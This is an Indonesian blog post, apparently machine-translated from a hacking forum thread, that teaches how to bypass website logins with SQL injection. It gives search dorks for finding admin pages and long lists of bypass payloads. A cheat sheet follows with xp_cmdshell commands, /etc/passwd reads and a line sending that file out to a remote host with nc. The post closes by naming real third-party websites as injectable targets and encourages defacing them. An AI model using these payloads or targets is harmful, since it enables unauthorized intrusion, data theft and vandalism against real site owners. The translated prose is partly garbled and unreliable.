tutorialSQL injection menggunakan Login Queries tutorialSQL injection menggunakan Login Queries

Wednesday, April 10, 2013

tutorialSQL injection menggunakan Login Queries

Melewati halaman Login pada website menggunakan query SQL suntik
Level: Pemula dan MenengahPersyaratan: Kesabaran dan stradegyBaiklah dalam tutorial ini, kita akan belajar bagaimana untuk memotong halaman login dengan bantuan injeksi MySequel menggunakan Login Query.Ini adalah Bab 2 dari megaproyek.Silahkan kunjungi Bab 1 jika Anda belum melihatnya: http://www.hackforums.net/showthread.php?tid=2059771Juga, jika Anda membutuhkan beberapa pertanyaan dijawab, Anda dapat menemukan solusi di FAQ Thread saya: http://www.hackforums.net/showthread.php?tid=1993481Apa SQL injection?Jawaban: Pada dasarnya, itu sebuah proses di mana Anda mengeksekusi query tertentu dalam sebuah website untuk mengekstrak informasi seperti informasi log-in, pengguna dll baik untuk keuntungan pribadi atau digunakan secara acak dari database website.Ada banyak jenis pertanyaan tertentu yang dapat dilaksanakan dalam rangka untuk mengekstrak informasi secara ilegal dari database website.Dalam tutorial ini permintaan kita akan menggunakan adalah Dasar SQL injection permintaan tempat yang dapat dieksekusi dalam halaman login.Contoh:Code:Username: adminSandi: 'atau '1' = '1Bila Anda memasukkan password "'atau '1' = '1" di sebagian besar situs, ada kemungkinan Anda bisa mendapatkan akses.Bagaimana hal itu terjadi? Melihat kode ketika kita mengeksekusi query yangPHP Code:SELECT * FROM penggunaWHERE username = 'admin'DAN password = '' atau '1 '= '1'Pada kolom password, kita dimasukkan kutipan 'pertama, kemudian sekelompok karakter acak seperti "1".Database selalu memindai baris dan karenanya dalam query kita telah dieksekusi, hanya ada 1 baris yang menyatakan bahwa tidak ada alasan untuk login tidak benar.Namun, beberapa situs web dapat menyaring jenis pertanyaan ini, jadi yang terbaik untuk menggunakan yang berbeda juga. Anda dapat menemukan beberapa di bawah iniSekarang bahwa Anda memiliki gagasan tentang bagaimana Dasar SQL injection query kerja, mari kita mencoba dan memanfaatkannya akan kitaLangkah 1: Menemukan website dengan Login HalamanBaiklah, dari pendekatan dasar adalah untuk menemukan beberapa situs dengan halaman login sehingga kita dapat mengeksekusi query kita untuk memotong itu.Untuk ini, kita dapat menggunakan Dorks.Jika Anda tidak tahu bagaimana menggunakan Dorks atau tidak tahu tentang hal itu, silakan kunjungi tutorial saya sebelumnya: http://www.hackforums.net/showthread.php?tid=2059771Dalam tutorial ini, kita dapat menggunakan Dorks ini:Code:inurl :/ login.phpinurl :/ admin.phpinurl :/ admininurl :/ login.htmlJika Anda ingin menemukan lebih Dorks ketika menggunakan metode ini, Anda dapat menemukannya di sini:Code:http://pastebin.com/ZjxpivV3Step2: Sekarang Pelaksana queryBaiklah, sekarang Anda telah menemukan target Anda dengan masuk halaman, mari kita bermain dengan itu sedikit.Jadi, inilah yang akan kau lakukanNama pengguna akan menjadi admin, menyebabkan sebagian besar situs yang memiliki data admin tersimpan dalam database merekaCode:Username: adminSandi: 'atau 0 = 0 -Tidak bekerja? Jangan khawatir, ada lebih dari sekedar itu query tunggalBerikut daftar password tanya dapat Anda gunakan untuk mudah-mudahan menyuntikkan situs.

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

Kredit untuk RealSteal untuk beberapa kode yang disebutkan di atas.Catatan: Kadang-kadang, ini bukan cara terbaik untuk hacking website dengan SQL injection tapi saya jamin, Anda akan menjadi pasien sukses SQL injector dan terbiasa dengan metode ini.Step3: saya log in, apa yang harus dilakukan sekarang?!Yah, pertama, jika Anda melakukan login, maka Congratz pada upaya pertama yang berhasil Anda injeksi SQL.Jadi, pada dasarnya ada banyak hal yang dapat Anda lakukan dengan situs.Kebanyakan orang akan senang untuk deface ituLain hanya akan membayar dan memiliki kegunaan lain seperti perakaran, webhosting dllJika ingin deface website, cari homepage dan menggantinya dengan halaman deface Anda.Sebuah tutorial saya tentang cara deface halaman akan segera hadirSekarang Anda mungkin ingin menonton video sehingga Anda akan mendapatkan ide tentang bagaimana saya login sebagai Administrator pada sebuah situs web yang rentan SQLi
Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

Jika versi database lebih besar dari 5, maka query dengan UNION, kelompok, @ @ version, orderby, patokan dll dapat dieksekusiCode:
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'
Versi database lebih rendah dari 5 yaitu Versi 4 tidak dapat menerima UNION versi 5 jenis query.Mencari tes atau tantangan?Coba Stewie itu hack uji: http://www.stewie390.info/hack_tests/lvl5/homepage.phpBerikut adalah beberapa situs Anda dapat menguji pada:Code:http://www.amskrupajal.org/AdminLogin.asphttp://www.csimatrichss.org/adminpage.asphttp://www.preventivecardiology.in/adminlogin.asphttp://pndllc.com/pndllc/admin/adminlogin.asphttp://www.singleusemedical.com/admin/adminLogin.asphttp://www.ringjordan.com/admin.asphttp://sunmarytrust.org/adminlogin.aspAku mencoba menyuntikkan semua dari mereka dan itu berhasil, sehingga harus bekerja untuk Anda juga  

0 comments:

Post a Comment

pendapat ada tentang blog ini ?

 
bloger hat © 2013 Templates | imamkenteng